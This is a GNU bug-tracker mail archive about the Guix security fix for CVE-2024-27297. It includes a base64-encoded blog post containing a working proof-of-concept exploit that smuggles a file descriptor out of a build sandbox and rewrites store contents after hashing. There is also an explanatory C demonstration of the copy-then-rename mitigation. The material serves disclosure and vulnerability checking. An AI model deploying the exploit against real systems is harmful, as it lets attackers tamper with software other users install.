CiAgICAgICAgICBtc2cubXNnX2lvdlswXS5pb3ZfYmFzZSA9IFwiXCI7CiAgICAgICAgICBtc2cu bXNnX2lvdlswXS5pb3ZfbGVuID0gMTsKICAgICAgICAgIG1zZy5tc2dfaW92bGVuID0gMTsKCiAg ICAgICAgICAvLyBTZW5kIGl0IHRvIHRoZSBvdGhoZXIgc2lkZSBvZiB0aGlzIGNvbm5lY3Rpb24u CiAgICAgICAgICByZXMgPSBzZW5kbXNnKHNvY2ssICZtc2csIDApOwogICAgICAgICAgaWYgKHJl cyA8IDApIHBlcnJvcihcInNlbmRtc2dcIik7CiAgICAgICAgICBpbnQgYnVmOwoKICAgICAgICAg IC8vIFdhaXQgZm9yIHRoZSBzZXJ2ZXIgdG8gY2xvc2UgdGhlIHNvY2tldCwgaW1wbHlpbmcgdGhh dCBpdCBoYXMKICAgICAgICAgIC8vIHJlY2VpdmVkIHRoZSBjb21tbWFuZC4KICAgICAgICAgIHJl Y3Yoc29jaywgKHZvaWQgKikmYnVmLCBzaXplb2YoaW50KSwgMCk7CiAgICAgIH0iKSkKCihkZWZp bmUgcmVjZWl2ZXItc291cmNlCiAgKG1peGVkLXRleHQtZmlsZSAicmVjZWl2ZXIuYyIgIgogICAg ICAjaW5jbHVkZSA8c3lzL3NvY2tldC5oPgogICAgICAjaW5jbHVkZSA8c3lzL3VuLmg+CiAgICAg ICNpbmNsdWRlIDxzdGRsaWIuaD4KICAgICAgI2luY2x1ZGUgPHN0ZGRlZi5oPgogICAgICAjaW5j bHVkZSA8c3RkaW8uaD4KICAgICAgI2luY2x1ZGUgPHVuaXN0ZC5oPgogICAgICAjaW5jbHVkZSA8 c3lzL2lub3RpZnkuaD4KCiAgICAgIGludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgewog ICAgICAgICAgaW50IHNvY2sgPSBzb2NrZXQoQUZfVU5JWCwgU09DS19TVFJFQU0sIDApOwoKICAg ICAgICAgIC8vIEJpbmQgdG8gdGhlIHNvY2tldC4KICAgICAgICAgIHN0cnVjdCBzb2NrYWRkcl91 biBkYXRhOwogICAgICAgICAgZGF0YS5zdW5fZmFtaWx5ID0gQUZfVU5JWDsKICAgICAgICAgIGRh dGEuc3VuX3BhdGhbMF0gPSAwOwogICAgICAgICAgc3RyY3B5KGRhdGEuc3VuX3BhdGggKyAxLCBc ImRpaHV0ZW5vc2FcIik7CiAgICAgICAgICBpbnQgcmVzID0gYmluZChzb2NrLCAoY29uc3Qgc3Ry dWN0IHNvY2thZGRyICopJmRhdGEsCiAgICAgICAgICAgICAgb2Zmc2V0b2Yoc3RydWN0IHNvY2th ZGRyX3VuLCBzdW5fcGF0aCkKICAgICAgICAgICAgICArIHN0cmxlbihcImRpaHV0ZW5vc2FcIikK ICAgICAgICAgICAgICArIDEpOwogICAgICAgICAgaWYgKHJlcyA8IDApIHBlcnJvcihcImJpbmRc Iik7CgogICAgICAgICAgcmVzID0gbGlzdGVuKHNvY2ssIDEpOwogICAgICAgICAgaWYgKHJlcyA8 IDApIHBlcnJvcihcImxpc3RlblwiKTsKCiAgICAgICAgICB3aGlsZSAoMSkgewogICAgICAgICAg ICAgIHNldHZidWYoc3Rkb3V0LCBOVUxMLCBfSU9MQkYsIDApOwogICAgICAgICAgICAgIHByaW50 ZihcImFjY2VwdGluZyBjb25uZWN0aW9ucy4uLlxcblwiKTsKICAgICAgICAgICAgICBpbnQgYSA9 
IGFjY2VwdChzb2NrLCAwLCAwKTsKICAgICAgICAgICAgICBpZiAoYSA8IDApIHBlcnJvcihcImFj Y2VwdFwiKTsKCiAgICAgICAgICAgICAgc3RydWN0IG1zZ2hkciBtc2cgPSB7MH07CiAgICAgICAg ICAgICAgbXNnLm1zZ19jb250cm9sID0gbWFsbG9jKDEyOCk7CiAgICAgICAgICAgICAgbXNnLm1z Z19jb250cm9sbGVuID0gMTI4OwoKICAgICAgICAgICAgICAvLyBSZWNlaXZlIHRoZSBmaWxlIGRl c2NyaXB0b3IgYXMgc2VudCBieSB0aGUgc211Z2dsZXIuCiAgICAgICAgICAgICAgcmVjdm1zZyhh LCAmbXNnLCAwKTsKCiAgICAgICAgICAgICAgc3RydWN0IGNtc2doZHIgKmhkciA9IENNU0dfRklS U1RIRFIoJm1zZyk7CiAgICAgICAgICAgICAgd2hpbGUgKGhkcikgewogICAgICAgICAgICAgICAg ICBpZiAoaGRyLT5jbXNnX2xldmVsID09IFNPTF9TT0NLRVQKICAgICAgICAgICAgICAgICAgICYm IGhkci0+Y21zZ190eXBlID09IFNDTV9SSUdIVFMpIHsKICAgICAgICAgICAgICAgICAgICAgIGlu dCByZXM7CgogICAgICAgICAgICAgICAgICAgICAgLy8gR3JhYiB0aGUgY29weSBvZiB0aGUgZmls ZSBkZXNjcmlwdG9yLgogICAgICAgICAgICAgICAgICAgICAgbWVtY3B5KCh2b2lkICopJnJlcywg Q01TR19EQVRBKGhkciksIHNpemVvZihpbnQpKTsKICAgICAgICAgICAgICAgICAgICAgIHByaW50 ZihcInByZXBhcmluZyBvdXIgaGFuZC4uLlxcblwiKTsKCiAgICAgICAgICAgICAgICAgICAgICBm dHJ1bmNhdGUocmVzLCAwKTsKICAgICAgICAgICAgICAgICAgICAgIC8vIFdyaXRlIHRoZSBleHBl Y3RlZCBjb250ZW50cyB0byB0aGUgZmlsZSwgdHJpY2tpbmcgTml4CiAgICAgICAgICAgICAgICAg ICAgICAvLyBpbnRvIGFjY2VwdGluZyBpdCBhcyBtYXRjaGluZyB0aGUgZml4ZWQtb3V0cHV0IGhh c2guCiAgICAgICAgICAgICAgICAgICAgICB3cml0ZShyZXMsIFwiaGVsbG8sIHdvcmxkXFxuXCIs IHN0cmxlbihcImhlbGxvLCB3b3JsZFxcblwiKSk7CgogICAgICAgICAgICAgICAgICAgICAgLy8g QnV0IHdhaXQsIHRoZSBmaWxlIGlzIGJpZ2dlciB0aGFuIHRoaXMhIFdoYXQgY291bGQKICAgICAg ICAgICAgICAgICAgICAgIC8vIHRoaXMgY29kZSBoaWRlPwoKICAgICAgICAgICAgICAgICAgICAg IC8vIEZpcnN0LCB3ZSBkbyBhIGJpdCBvZiBhIGhhY2sgdG8gZ2V0IGEgcGF0aCBmb3IgdGhlCiAg ICAgICAgICAgICAgICAgICAgICAvLyBmaWxlIGRlc2NyaXB0b3Igd2UgcmVjZWl2ZWQuIFRoaXMg aXMgbmVjZXNzYXJ5IGJlY2F1c2UKICAgICAgICAgICAgICAgICAgICAgIC8vIHRoYXQgZmlsZSBk b2Vzbid0IGV4aXN0IGluIG91ciBtb3VudCBuYW1lc3BhY2UhCiAgICAgICAgICAgICAgICAgICAg ICBjaGFyIGJ1ZlsxMjhdOwogICAgICAgICAgICAgICAgICAgICAgc3ByaW50ZihidWYsIFwiL3By 
b2Mvc2VsZi9mZC8lZFwiLCByZXMpOwoKICAgICAgICAgICAgICAgICAgICAgIC8vIEhvb2sgdXAg YW4gaW5vdGlmeSBvbiB0aGF0IGZpbGUsIHNvIHdoZW5ldmVyIE5peAogICAgICAgICAgICAgICAg ICAgICAgLy8gY2xvc2VzIHRoZSBmaWxlLCB3ZSBnZXQgbm90aWZpZWQuCiAgICAgICAgICAgICAg ICAgICAgICBpbnQgaW5vdCA9IGlub3RpZnlfaW5pdCgpOwogICAgICAgICAgICAgICAgICAgICAg aW5vdGlmeV9hZGRfd2F0Y2goaW5vdCwgYnVmLCBJTl9DTE9TRV9OT1dSSVRFKTsKCiAgICAgICAg ICAgICAgICAgICAgICAvLyBOb3RpZnkgdGhlIHNtdWdnbGVyIHRoYXQgd2UndmUgc2V0IGV2ZXJ5 dGhpbmcgdXAgZm9yCiAgICAgICAgICAgICAgICAgICAgICAvLyB0aGUgbWFnaWMgdHJpY2sgd2Un cmUgYWJvdXQgdG8gZG8uCiAgICAgICAgICAgICAgICAgICAgICBjbG9zZShhKTsKCiAgICAgICAg ICAgICAgICAgICAgICAvLyBTbywgYmVmb3JlIHdlIGNvbnRpbnVlIHdpdGggdGhpcyBjb2RlLCBh IHRyaXAgaW50byBOaXgKICAgICAgICAgICAgICAgICAgICAgIC8vIHJldmVhbHMgYSBzbWFsbCBm bGF3IGluIGZpeGVkLW91dHB1dCBkZXJpdmF0aW9ucy4gV2hlbgogICAgICAgICAgICAgICAgICAg ICAgLy8gc3RvcmluZyB0aGVpciBvdXRwdXQsIE5peCBoYXMgdG8gaGFzaCB0aGVtIHR3aWNlLiBP bmNlCiAgICAgICAgICAgICAgICAgICAgICAvLyB0byB2ZXJpZnkgdGhleSBtYXRjaCB0aGUgXCJm bGF0XCIgaGFzaCBvZiB0aGUgZGVyaXZhdGlvbgogICAgICAgICAgICAgICAgICAgICAgLy8gYW5k IG9uY2UgbW9yZSBhZnRlciBwYWNraW5nIHRoZSBmaWxlIGludG8gdGhlIE5BUiB0aGF0CiAgICAg ICAgICAgICAgICAgICAgICAvLyBnZXRzIHNlbnQgdG8gYSBiaW5hcnkgY2FjaGUgZm9yIG90aGVy cyB0byBjb25zdW1lLiBBbmQKICAgICAgICAgICAgICAgICAgICAgIC8vIHRoZXJlJ3MgYSB2ZXJ5 IHNsaWdodCB3aW5kb3cgaW5iZXR3ZWVuLCB3aGVyZSB3ZSBjb3VsZAogICAgICAgICAgICAgICAg ICAgICAgLy8ganVzdCBzd2FwIHRoZSBjb250ZW50cyBvZiBvdXIgZmlsZS4gQnV0IHRoZSBmaXJz dCBoYXNoCiAgICAgICAgICAgICAgICAgICAgICAvLyBpcyBzdGlsbCBub3RlZCBkb3duLCBhbmQg Tml4IHdpbGwgcmVmdXNlIHRvIGltcG9ydCBvdXIKICAgICAgICAgICAgICAgICAgICAgIC8vIE5B UiBmaWxlLiBUbyB0cmljayBpdCwgd2UgbmVlZCB0byB3cml0ZSBhIHJlZmVyZW5jZSB0bwogICAg ICAgICAgICAgICAgICAgICAgLy8gYSBzdG9yZSBwYXRoIHRoYXQgdGhlIHNvdXJjZSBjb2RlIGZv ciB0aGUgc211Z2dsZXIgZHJ2CiAgICAgICAgICAgICAgICAgICAgICAvLyByZWZlcmVuY2VzLCB0 byBlbnN1cmUgaXQgZ2V0cyBwaWNrZWQgdXAuIENvbnRpbnVpbmcuLi4KCiAgICAgICAgICAgICAg 
ICAgICAgICAvLyBXYWl0IGZvciB0aGUgbmV4dCBpbm90aWZ5IGV2ZW50IHRvIGRyb3A6CiAgICAg ICAgICAgICAgICAgICAgICByZWFkKGlub3QsIGJ1ZiwgMTI4KTsKCiAgICAgICAgICAgICAgICAg ICAgICAvLyBmaXJzdCByZWFkICsgQ0EgY2hlY2sgaGFzIGp1c3QgYmVlbiBkb25lLCBOaXggaXMg YWJvdXQKICAgICAgICAgICAgICAgICAgICAgIC8vIHRvIGNob3duIHRoZSBmaWxlIHRvIHJvb3Qu IGFmdGVyd2FyZHMsIHJlZnNjYW5uaW5nCiAgICAgICAgICAgICAgICAgICAgICAvLyBoYXBwZW5z Li4uCgogICAgICAgICAgICAgICAgICAgICAgLy8gRW1wdHkgdGhlIGZpbGUsIHNlZWsgdG8gc3Rh cnQuCiAgICAgICAgICAgICAgICAgICAgICBmdHJ1bmNhdGUocmVzLCAwKTsKICAgICAgICAgICAg ICAgICAgICAgIGxzZWVrKHJlcywgMCwgU0VFS19TRVQpOwoKICAgICAgICAgICAgICAgICAgICAg IC8vIFdlIHN3YXAgb3V0IHRoZSBjb250ZW50cyEKICAgICAgICAgICAgICAgICAgICAgIHN0YXRp YyBjb25zdCBjaGFyIGNvbnRlbnRbXSA9IFwiVGhpcyBmaWxlIGhhcyBiZWVuIGNvcnJ1cHRlZCFc XG5cIjsKICAgICAgICAgICAgICAgICAgICAgIHdyaXRlKHJlcywgY29udGVudCwgc3RybGVuIChj b250ZW50KSk7CiAgICAgICAgICAgICAgICAgICAgICBjbG9zZShyZXMpOwoKICAgICAgICAgICAg ICAgICAgICAgIHByaW50ZihcInN3YXB0cmljayBmaW5pc2hlZCwgbm93IHRvIHdhaXQuLlxcblwi KTsKICAgICAgICAgICAgICAgICAgICAgIHJldHVybiAwOwogICAgICAgICAgICAgICAgICB9Cgog ICAgICAgICAgICAgICAgICBoZHIgPSBDTVNHX05YVEhEUigmbXNnLCBoZHIpOwogICAgICAgICAg ICAgIH0KICAgICAgICAgICAgICBjbG9zZShhKTsKICAgICAgICAgIH0KICAgICAgfSIpKQoKKGRl ZmluZSBub25jZQogIChzdHJpbmctYXBwZW5kICItIiAobnVtYmVyLT5zdHJpbmcgKGNhciAoZ2V0 dGltZW9mZGF5KSkgMTYpCiAgICAgICAgICAgICAgICAgIi0iIChudW1iZXItPnN0cmluZyAoZ2V0 cGlkKSkpKQoKKGRlZmluZSBvcmlnaW5hbC10ZXh0CiAgIlRoaXMgaXMgdGhlIG9yaWdpbmFsIHRl eHQsIGJlZm9yZSBjb3JydXB0aW9uLiIpCgooZGVmaW5lIGRlcml2YXRpb24tdGhhdC1leGZpbHRy YXRlcy1mZAogIChjb21wdXRlZC1maWxlIChzdHJpbmctYXBwZW5kICJkZXJpdmF0aW9uLXRoYXQt ZXhmaWx0cmF0ZXMtZmQiIG5vbmNlKQogICAgICAgICAgICAgICAgICh3aXRoLWltcG9ydGVkLW1v ZHVsZXMgJygoZ3VpeCBidWlsZCB1dGlscykpCiAgICAgICAgICAgICAgICAgICAjfihiZWdpbgog ICAgICAgICAgICAgICAgICAgICAgICh1c2UtbW9kdWxlcyAoZ3VpeCBidWlsZCB1dGlscykpCiAg ICAgICAgICAgICAgICAgICAgICAgKGludm9rZSAjKyhjb21waWxlZC1jLWNvZGUgInNlbmRlciIg 
c2VuZGVyLXNvdXJjZSkpCiAgICAgICAgICAgICAgICAgICAgICAgKGNhbGwtd2l0aC1vdXRwdXQt ZmlsZSAjJG91dHB1dAogICAgICAgICAgICAgICAgICAgICAgICAgKGxhbWJkYSAocG9ydCkKICAg ICAgICAgICAgICAgICAgICAgICAgICAgKGRpc3BsYXkgIyRvcmlnaW5hbC10ZXh0IHBvcnQpKSkp KQogICAgICAgICAgICAgICAgICM6b3B0aW9ucyBgKCM6aGFzaC1hbGdvIHNoYTI1NgogICAgICAg ICAgICAgICAgICAgICAgICAgICAgICM6aGFzaCAsKHNoYTI1NgogICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgIChzdHJpbmctPnV0Zjggb3JpZ2luYWwtdGV4dCkpKSkpCgooZGVm aW5lIGRlcml2YXRpb24tdGhhdC1ncmFicy1mZAogIChjb21wdXRlZC1maWxlIChzdHJpbmctYXBw ZW5kICJkZXJpdmF0aW9uLXRoYXQtZ3JhYnMtZmQiIG5vbmNlKQogICAgICAgICAgICAgICAgICN+ KGJlZ2luCiAgICAgICAgICAgICAgICAgICAgIChvcGVuLW91dHB1dC1maWxlICMkb3V0cHV0KSA7 bWFrZSBzdXJlIHRoZXJlJ3MgYW4gb3V0cHV0CiAgICAgICAgICAgICAgICAgICAgIChleGVjbCAj Kyhjb21waWxlZC1jLWNvZGUgInJlY2VpdmVyIiByZWNlaXZlci1zb3VyY2UpCiAgICAgICAgICAg ICAgICAgICAgICAgICAgICAicmVjZWl2ZXIiKSkKICAgICAgICAgICAgICAgICAjOm9wdGlvbnMg YCgjOmhhc2gtYWxnbyBzaGEyNTYKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjOmhhc2gg LChzaGEyNTYgI3Z1OCgpKSkpKQoKKGRlZmluZSBjaGVjawogIChjb21wdXRlZC1maWxlICJjaGVj a2luZy1mb3ItdnVsbmVyYWJpbGl0eSIKICAgICAgICAgICAgICAgICAjfihiZWdpbgogICAgICAg ICAgICAgICAgICAgICAodXNlLW1vZHVsZXMgKGljZS05IHRleHR1YWwtcG9ydHMpKQoKICAgICAg ICAgICAgICAgICAgICAgKG1rZGlyICMkb3V0cHV0KSAgICAgICAgICAgIDttYWtlIHN1cmUgdGhl cmUncyBhbiBvdXRwdXQKICAgICAgICAgICAgICAgICAgICAgKGZvcm1hdCAjdCAiVGhpcyBkZXBl bmRzIG9uIH5hLCB3aGljaCB3aWxsIGdyYWIgdGhlIGZpbGUKZGVzY3JpcHRvciBhbmQgY29ycnVw dCB+YS5+JX4lIgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICMrZGVyaXZhdGlvbi10aGF0 LWdyYWJzLWZkCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIytkZXJpdmF0aW9uLXRoYXQt ZXhmaWx0cmF0ZXMtZmQpCgogICAgICAgICAgICAgICAgICAgICAobGV0ICgoY29udGVudCAoY2Fs bC13aXRoLWlucHV0LWZpbGUKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICMrZGVyaXZhdGlvbi10aGF0LWV4ZmlsdHJhdGVzLWZkCiAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgZ2V0LXN0cmluZy1hbGwpKSkKICAgICAgICAgICAgICAgICAgICAgICAo 
Zm9ybWF0ICN0ICJIZXJlIGlzIHdoYXQgd2Ugc2VlIGluIH5hOiB+c34lfiUiCiAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAjK2Rlcml2YXRpb24tdGhhdC1leGZpbHRyYXRlcy1mZCBjb250 ZW50KQogICAgICAgICAgICAgICAgICAgICAgIChpZiAoc3RyaW5nPT8gY29udGVudCAjJG9yaWdp bmFsLXRleHQpCiAgICAgICAgICAgICAgICAgICAgICAgICAgIChmb3JtYXQgI3QgIkZhaWxlZCB0 byBjb3JydXB0IH5hLCBcCnlvdXIgc3lzdGVtIGlzIHNhZmUufiUiCiAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgIytkZXJpdmF0aW9uLXRoYXQtZXhmaWx0cmF0ZXMtZmQpCiAgICAg ICAgICAgICAgICAgICAgICAgICAgIChiZWdpbgogICAgICAgICAgICAgICAgICAgICAgICAgICAg IChmb3JtYXQgI3QgIldlIG1hbmFnZWQgdG8gY29ycnVwdCB+YSwgXAptZWFuaW5nIHRoYXQgWU9V UiBTWVNURU0gSVMgVlVMTkVSQUJMRSF+JSIKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICMrZGVyaXZhdGlvbi10aGF0LWV4ZmlsdHJhdGVzLWZkKQogICAgICAgICAgICAgICAg ICAgICAgICAgICAgIChleGl0IDEpKSkpKSkpCgpjaGVjawpgYGAKCiMjIyBBYm91dCBHTlUgR3Vp eAoKW0dOVSBHdWl4XShodHRwczovL2d1aXguZ251Lm9yZykgaXMgYSB0cmFuc2FjdGlvbmFsIHBh Y2thZ2UgbWFuYWdlcgphbmQgYW4gYWR2YW5jZWQgZGlzdHJpYnV0aW9uIG9mIHRoZSBHTlUgc3lz dGVtIHRoYXQgW3Jlc3BlY3RzIHVzZXIKZnJlZWRvbV0oaHR0cHM6Ly93d3cuZ251Lm9yZy9kaXN0 cm9zL2ZyZWUtc3lzdGVtLWRpc3RyaWJ1dGlvbi1ndWlkZWxpbmVzLmh0bWwpLgpHdWl4IGNhbiBi ZSB1c2VkIG9uIHRvcCBvZiBhbnkgc3lzdGVtIHJ1bm5pbmcgdGhlIEh1cmQgb3IgdGhlIExpbnV4 Cmtlcm5lbCwgb3IgaXQgY2FuIGJlIHVzZWQgYXMgYSBzdGFuZGFsb25lIG9wZXJhdGluZyBzeXN0 ZW0KZGlzdHJpYnV0aW9uIGZvciBpNjg2LCB4ODZfNjQsIEFSTXY3LCBBQXJjaDY0LCBhbmQgUE9X RVI5IG1hY2hpbmVzLgoKSW4gYWRkaXRpb24gdG8gc3RhbmRhcmQgcGFja2FnZSBtYW5hZ2VtZW50 IGZlYXR1cmVzLCBHdWl4IHN1cHBvcnRzCnRyYW5zYWN0aW9uYWwgdXBncmFkZXMgYW5kIHJvbGwt YmFja3MsIHVucHJpdmlsZWdlZCBwYWNrYWdlCm1hbmFnZW1lbnQsIHBlci11c2VyIHByb2ZpbGVz LCBhbmQgZ2FyYmFnZSBjb2xsZWN0aW9uLiBXaGVuIHVzZWQgYXMgYQpzdGFuZGFsb25lIEdOVS9M aW51eCBkaXN0cmlidXRpb24sIEd1aXggb2ZmZXJzIGEgZGVjbGFyYXRpdmUsCnN0YXRlbGVzcyBh cHByb2FjaCB0byBvcGVyYXRpbmcgc3lzdGVtIGNvbmZpZ3VyYXRpb24gbWFuYWdlbWVudC4gR3Vp eAppcyBoaWdobHkgY3VzdG9taXphYmxlIGFuZCBoYWNrYWJsZSB0aHJvdWdoCltHdWlsZV0oaHR0 
cHM6Ly93d3cuZ251Lm9yZy9zb2Z0d2FyZS9ndWlsZSkgcHJvZ3JhbW1pbmcgaW50ZXJmYWNlcyBh
bmQKZXh0ZW5zaW9ucyB0byB0aGUgW1NjaGVtZV0oaHR0cDovL3NjaGVtZXJzLm9yZykgbGFuZ3Vh
Z2UuCg==
--b1_xKx1i44DOSvJ7Di9xFsftR2PTnqrPGv5eGX1yxtDQ--

From debbugs-submit-bounces@debbugs.gnu.org Tue Mar 12 11:31:58 2024
From: Ludovic Courtès
To: John Kehayias
Subject: Re: bug#69728: [PATCH security] daemon: Protect against FD escape when building fixed-output derivations (CVE-2024-27297).
In-Reply-To: <87msr334do.fsf@protonmail.com> (John Kehayias's message of "Tue, 12 Mar 2024 14:35:18 +0000")
References: <87frwwo1mo.fsf@gnu.org> <871q8flg17.fsf_-_@gnu.org> <87msr334do.fsf@protonmail.com>
Date: Tue, 12 Mar 2024 16:31:00 +0100
Message-ID: <87a5n3jwln.fsf_-_@gnu.org>
User-Agent: Gnus/5.13 (Gnus v5.13)
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable
Cc: Picnoir , 69728@debbugs.gnu.org, Théophane Hufschmitt , guix-security@gnu.org

Hi John,

John Kehayias skribis:

> The updated post is attached. I will have some time here and there
> over the next few hours to make changes, but will mostly be away from
> my Guix machine to handle actually pushing. So, once it looks good,
> feel free to do that or I can do it this evening my time (in about 7-8
> hours).

LGTM, thank you!

Ludo’.
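The step the patch in this thread adds to the daemon for fixed-output derivations (copy each output, then rename the copy over the original) is easiest to understand in isolation. What follows is an added example, not code from Guix or from the patch: a stand-alone C program that models a builder holding a writable descriptor to its output, applies the detach step or skips it, lets the held descriptor write afterwards, and reports whether the file at the output path was affected. The temporary path under /tmp, the function names `detach_output` and `leaked_fd_corrupts_output`, and the sample texts are all constructed for this demonstration, and it handles a single regular file only, where the patch's `copyFileRecursively` also walks directories.

```c
/* Added example (not Guix's code, not the patch's code): why copying a
 * fixed-output result to a fresh file and renaming the copy over it
 * neutralizes a writable descriptor that escaped the build sandbox.
 * Paths, names and texts below are constructed for the demonstration. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define ORIGINAL_TEXT "This is the original text, before corruption.\n"
#define CORRUPT_TEXT  "This file has been corrupted!\n"

/* Copy src into a newly created file dst, i.e. onto a fresh inode.
 * Returns 0 on success, -1 on error.  (Regular files only; the real fix
 * also walks directories.) */
static int copy_file(const char *src, const char *dst)
{
    char buf[4096];
    ssize_t n;
    int in = open(src, O_RDONLY);
    if (in < 0)
        return -1;
    int out = open(dst, O_WRONLY | O_CREAT | O_EXCL, 0644);
    if (out < 0) {
        close(in);
        return -1;
    }
    while ((n = read(in, buf, sizeof buf)) > 0)
        if (write(out, buf, (size_t)n) != n) {
            n = -1;
            break;
        }
    close(in);
    close(out);
    return n < 0 ? -1 : 0;
}

/* The mitigation: give the output a brand-new inode.  Descriptors that
 * still refer to the old inode keep pointing at the old, now unlinked,
 * file, so nothing written through them reaches `path` any more. */
int detach_output(const char *path)
{
    char tmp[4096];
    if (snprintf(tmp, sizeof tmp, "%s.tmp", path) >= (int)sizeof tmp)
        return -1;
    if (copy_file(path, tmp) < 0)
        return -1;
    if (rename(tmp, path) < 0) {
        unlink(tmp);
        return -1;
    }
    return 0;
}

/* Read up to n-1 bytes of path into buf as a C string; -1 on error. */
static int read_file(const char *path, char *buf, size_t n)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    ssize_t got = read(fd, buf, n - 1);
    close(fd);
    if (got < 0)
        return -1;
    buf[got] = '\0';
    return 0;
}

/* One-process model of the race.  `leaked` plays the descriptor a builder
 * kept open to its output; the daemon either detaches the output
 * (detach = 1) or registers it as is (detach = 0); afterwards whoever holds
 * `leaked` writes through it.  Returns 1 if the file at the output path was
 * corrupted, 0 if it kept ORIGINAL_TEXT, -1 on a setup failure. */
int leaked_fd_corrupts_output(int detach)
{
    char path[] = "/tmp/fod-output-XXXXXX";   /* constructed location */
    char buf[128];
    int leaked = mkstemp(path);
    if (leaked < 0)
        return -1;
    if (write(leaked, ORIGINAL_TEXT, strlen(ORIGINAL_TEXT)) < 0)
        return -1;
    if (detach && detach_output(path) < 0)
        return -1;

    /* Late write through the descriptor that left the sandbox. */
    if (ftruncate(leaked, 0) < 0 || lseek(leaked, 0, SEEK_SET) < 0
        || write(leaked, CORRUPT_TEXT, strlen(CORRUPT_TEXT)) < 0)
        return -1;
    close(leaked);

    int rc = read_file(path, buf, sizeof buf);
    unlink(path);
    if (rc < 0)
        return -1;
    return strcmp(buf, ORIGINAL_TEXT) != 0;
}

int main(void)
{
    printf("no detach: corrupted=%d\n", leaked_fd_corrupts_output(0));
    printf("detach:    corrupted=%d\n", leaked_fd_corrupts_output(1));
    return 0;
}
```

Running it prints two lines: without the detach step the late write lands in the file that would be registered, with it the write goes to the old, unlinked inode and the output path keeps its original content. The protection only holds if the daemon hashes and registers the fresh copy rather than the original, and every output pays a full copy, which is the cost the copy-then-rename approach accepts.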
From debbugs-submit-bounces@debbugs.gnu.org Wed Mar 13 06:03:49 2024
From: Ludovic Courtès
To: John Kehayias
Subject: Re: bug#69728: [PATCH security] daemon: Protect against FD escape when building fixed-output derivations (CVE-2024-27297).
In-Reply-To: <87a5n3jwln.fsf_-_@gnu.org> (Ludovic Courtès's message of "Tue, 12 Mar 2024 16:31:00 +0100")
References: <87frwwo1mo.fsf@gnu.org> <871q8flg17.fsf_-_@gnu.org> <87msr334do.fsf@protonmail.com> <87a5n3jwln.fsf_-_@gnu.org>
Date: Wed, 13 Mar 2024 11:00:42 +0100
Message-ID: <871q8ejvsl.fsf_-_@gnu.org>
User-Agent: Gnus/5.13 (Gnus v5.13)
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable
Cc: Picnoir , guix-security@gnu.org, Théophane Hufschmitt , 69728-done@debbugs.gnu.org

For posterity: the blog post was published yesterday at .

Ludo’.

From unknown Sat Sep 06 05:21:21 2025
Received: (at fakecontrol) by fakecontrolmessage;
To: internal_control@debbugs.gnu.org
From: Debbugs Internal Request
Subject: Internal Control
Message-Id:
bug archived.
Date: Wed, 10 Apr 2024 11:24:06 +0000
User-Agent: Fakemail v42.6.9

# This is a fake control message.
#
# The action:
# bug archived.
thanks
# This fakemail brought to you by your local debbugs
# administrator